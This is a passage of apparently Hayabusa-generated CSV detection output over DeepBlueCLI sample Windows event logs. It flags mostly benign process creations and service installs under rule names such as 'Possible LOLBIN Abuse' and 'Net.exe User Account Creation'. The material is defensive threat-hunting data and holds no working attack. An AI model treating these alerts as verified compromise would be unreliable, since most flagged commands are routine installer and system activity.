Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.381 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:43:52.381 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:44:24.817 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 19:44:24.820 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:00:10.327 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:05:18.971 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:06:54.664 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:06:54.679 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:07:56.345 +00:00,IE10Win7,4688,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation_builtin/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:12:07.898 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.543 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.691 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.743 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.761 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.771 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:39:28.809 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:46:10.436 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:46:27.488 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:46:27.704 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:47:09.257 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:47:09.370 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:01.641 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:09.250 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:18.846 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.301 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.346 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.355 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:48:20.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.379 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.416 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:48:20.426 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.439 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.450 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:48:20.460 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:20.468 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:48:22.723 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:49:59.321 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:05.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:05.541 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:19.219 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:19.686 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-01 20:50:19.909 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.040 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.058 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.147 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.214 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:50:20.258 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.687 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.767 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.804 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.815 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 20:53:20.853 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 21:14:21.908 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 21:24:37.363 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 21:24:37.378 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:32.954 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.005 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.233 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.396 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.853 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:33.972 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:08:53.121 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:10:30.765 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:46:22.988 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:46:23.139 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:46:23.201 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:48:22.957 